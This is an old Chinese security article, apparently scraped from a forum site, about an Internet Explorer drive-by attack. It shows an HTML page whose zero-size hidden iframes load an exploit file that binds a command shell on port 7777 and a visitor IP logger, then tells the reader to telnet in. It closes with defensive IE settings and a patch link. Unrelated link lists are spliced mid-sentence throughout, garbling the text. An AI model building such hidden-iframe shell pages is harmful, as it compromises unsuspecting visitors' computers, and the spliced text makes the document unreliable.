没有太多的时间解释,这里做了个测试页
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>New Page 1</title>
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
</head>
<body>
<p><img src="ot2131.JPG" width="322" height="486"></p>
<iframe src="load.eml" width="0" height="0" frameborder="no" border="0"
marginwidth="0" marginheight="0" scrolling="no">
</iframe>
<iframe src="fangwen.htm" width="0" height="0" frameborder="no" border="0"
marginwidth="0" marginheight="0" scrolling="no">
</iframe>
</body>
</html>
上面这个页面首先利用了IE的APP怎样利用Perl CGI和LB5K的缺陷攻占远程服务器堵住NT的安全漏洞Nimda/尼姆达蠕虫报告_update Microsoft Windows NTFS 文件影响漏洞unicode编码漏洞全攻略-1UNIX系统编程常用库函数说明常见端口详解及部分攻击策略 如何隐藏你的踪迹输入法漏洞之完全心得保护数据库服务器加强数据库安全相关链接共 205 篇','相关的链接')" href="http://www.safechina.net/article/showarticle.php?id=1004718661#"漏洞,它对含有 HTML 语句的文本不检查扩展名。
在 NOTEPAD 上写一份 HTML 文件,保存为 .jpg。上传至空间shadow发现新浪cgi漏洞的过程 一般入侵所需要的几个常用命令 Perl的安全性监测国货精品----NetHackerII木马的分析方法 学习Linux网络编程(2)七个维护服务器安全的技巧解析IE中的about:blankbind8.2-8.2.2漏洞利用HOWTO基于NT/2000建立安全WEB站点的解决方案相关链接共 262 篇','相关的链接')" href="http://www.safechina.net/article/showarticle.php?id=1004718661#"服务器,用 IE 访问
bind8.2-8.2.2漏洞利用HOWTONT新BUG,远程DoS攻击 设计安全的Linux网络The Solaris安全FAQ如何阅读源代码教学文件(感谢网友提供!)在FreeBSD上运行Windows软件PHP 预设安装法在 NT/Apache 上所产生的系统漏洞Linux下的代理服务器设置后门技巧相关链接共 112 篇','相关的链接')" href="http://www.safechina.net/article/showarticle.php?id=1004718661#"URL。发现,IE 把 .jpg 误读成 .html.
接下来我们用了两个 iframe 分别调用页面,
load.eml
fangwen.htm
显示大小为 width="0" height="0" 所以在页面中不显示,
load.eml 是利用了ie的通过构造特殊代码导致 IE 用户执行攻击者命令漏洞
当用户访问load.eml 时将被自动的起出端口 7777的cmd Wscript.Shell 对象详细介绍BIND 8 exploit 木马程序简析 nc使用技巧帐号安全(感谢Phoenix原创!)浅析Apache服务器中SSI和CGI的设定方法分析Buffer Overflow之ShellCode程式port list(from neohapsis)Windows 2000漏洞集锦Daemon是怎样练成的Nimda/尼姆达蠕虫报告_update相关链接共 145 篇','相关的链接')" href="http://www.safechina.net/article/showarticle.php?id=1004718661#"shell
+++++++++++++++++++++++++++++++++++++++++++++++++++++
fangwen.htm 是一个记数统计器,用于查看哪些人,在几点,什么ip访问过。
=======================================================
ok , 现在你在命令行输入 telnet 目标ip 7777 就可以知道结果了!
下面就是那个JPG图像:
没装通过SOCKS5上OICQ隐藏真实IP关注内网安全:网络卫士LANguard详解一些FreeBSD相关的安全问题 如何避免浏览网页时硬盘被共享Win2000 Server入侵监测攻破天网的几种办法国内最流行十大木马查杀简评黑客的终极武器-DDoS已公布的信息技术安全标准The Solaris安全FAQ相关链接共 103 篇','相关的链接')" href="http://www.safechina.net/article/showarticle.php?id=1004718661#"防火墙请不要点击 (有木马!!!)
------------------------------------
预防方法:
1.最好的办法是不使用IE和Outlook。可以用Netscape代替IE,用Foxmail代替Outlook。如果非要用,建议你按下面的方法进行操作:
(1)运行IE,点击“工具→Internet选项→安全→Internet区域的安全级别”,把安全极别由“中”改为“高”。
(2)接着,点击“自定义级别”按钮,在弹出的窗口中,禁用“对标记为可安全执行脚本的ActiveX控件执行脚本”选项。
(3)同理,在此窗口中禁用IE的“活动脚本”和“文件下载”功能。
(4)禁用所有的ActiveX控制和插件。
(5)设置资源管理器成“始终显示扩展名”。
(6)禁止以WEB方式使用资源管理器。
(7)取消“下载后确认打开”这种扩展名属性设置。
(8)永远不直接从IE浏览器中选择打开文件。
2.不要受陌生人的诱惑打开别人给你的RUL,如果确实想看,可以通过一些下载工具把页面下载下来,然后用记事本等一些文本编辑工具打开查看代码。
3.微软公司为该漏洞提供了一个补丁,赶快到下面所列出的URL去看看吧:
http://www.microsoft.com/windows/ie/download/critical/
Q290108/default.asp